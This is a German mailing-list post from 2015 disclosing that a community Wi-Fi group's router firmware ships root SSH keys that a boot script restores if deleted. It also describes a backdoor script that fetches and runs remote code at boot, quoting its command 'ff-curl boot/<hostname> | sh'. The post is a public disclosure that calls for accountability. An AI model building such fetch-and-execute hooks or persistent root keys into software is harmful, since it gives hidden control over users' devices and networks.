[WLANtalk] Hallo Vorstand vom Verbund Freie Netzwerke NRW, Hallo Liste,

Malte Moeller malte.moeller at halifax.rwth-aachen.de
Do Mär 26 20:20:02 CET 2015


Hallo Vorstand vom Verbund Freie Netzwerke NRW, Hallo Liste,

da für mich in Frage kam bei einem Bekannten in Leverkusen einen "HotSpot"
von euch aufzustellen habe ich mir eure Firmware zum Test selber
Installiert.

Die Firmware enthält von vorne herein mehrere ssh keys die vollen root
Zugang zu den Geräten (und damit dem gesamten lokalen Netzwerk)
ermöglichen, neben den privaten Schlüsseln von tobias at freifunk-nrw.de und
kevinolbrich at Kevins-MacBook-Pro.local werden mutmaßlich auch die Schlüssel
von Servern hinzugefügt: maintsb, maintrw1 und maintrw2. Siehe:
https://github.com/FF-NRW/Firmware/blob/master/authorized_keys.default

Werden diese Schlüssel gelöscht, stellt sie ein Skript beim booten wieder
her.

Zudem startet der Knoten per default, zumindest bei jedem Bootvorgang,
beliebigen code, den er mit dem Skript /etc/freifunk/start.backdoor nach
lädt:

ff-curl boot/$(cat /proc/sys/kernel/hostname) | sh

Derartig konfigurierte Knoten wurden auch in mindesten einem Parteibüro der
Piraten aufgestellt. Es ist davon auszugehen, dass auch die andern Knoten
im Feld, Beispielsweise im Rathaus in Wermelskirchen über derartiges
verfügen:
http://freifunk.liztv.net/batmap/51.141062277444036,7.214093533172478,18

Bei einer Durchsicht eures gits habe ich festgestellt, dass zumindest das
Backdoor Modul inzwischen wieder entfernt wurde:
https://github.com/FF-NRW/Firmware/commit/bd682a057894c6d06136a18378de66c640abc2c3

Allerdings vom selben User, der es im Juli 2014 implementiert hat:
https://github.com/FF-NRW/Firmware/commits/87251c48cb68b82f67647b2fa182d1b045500268/files/default/etc/freifunk/start.backdoor

Ich fordere den Vorstand des VfN auf die Angelegenheit zu klären und sofern
sie strafrechtlich relevant ist gegen die entsprechenden Mitglieder Anzeige
zu erstatten. Eine öffentliche Stellungnahme zur vergangenen Praxis und dem
zukünftigen Vorgehen halte ich für zwingend notwendig!

Vom Förderverein Freie Netzwerke e. V. wünsche ich mir eine klare
Distanzierung von derartigem Verhalten. Ich persönlich empfinde es als
unerträglich, dass ein Verein, der derartiges Verhalten von einem
Vorstandsmitglied duldet, von euch als Freifunk anerkannt wird. Schlimmer,
sich Freifunk NRW nennt und damit weitere Vereine in Verruf zieht.

Viele Grüße
Malte Möller
-------------- nächster Teil --------------
Ein Dateianhang mit HTML-Daten wurde abgetrennt...
URL: <http://lists.freifunk.net/pipermail/wlantalk-freifunk.net/attachments/20150326/00d9db18/attachment.html>


Mehr Informationen über die Mailingliste WLANtalk